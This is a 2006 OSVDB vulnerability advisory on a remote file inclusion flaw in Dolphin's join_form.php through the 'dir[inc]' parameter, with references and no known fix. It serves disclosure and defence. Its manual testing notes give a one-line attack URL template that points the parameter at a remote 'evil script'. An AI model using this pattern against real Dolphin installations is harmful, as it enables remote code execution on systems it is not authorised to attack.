Dolphin join_form.php dir[inc] Variable Remote File Inclusion

2006-08-14T02:49:04
ID OSVDB:28494
Type osvdb
Reporter Charles Nelwan a.k.a Cmaster4(bugtraq_indo@yahoo.com)
Modified 2006-08-14T02:49:04

Description

Vulnerability Description

Dolphin contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the join_form.php script not properly sanitizing user input supplied to the 'dir[inc]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Dolphin contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the join_form.php script not properly sanitizing user input supplied to the 'dir[inc]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/join_form.php?dir[inc]=[Evil Script]

References:

Vendor URL: http://www.boonex.com/products/dolphin/ Security Tracker: 1016692 Secunia Advisory ID:21535 ISS X-Force ID: 28363 FrSIRT Advisory: ADV-2006-3346 CVE-2006-4189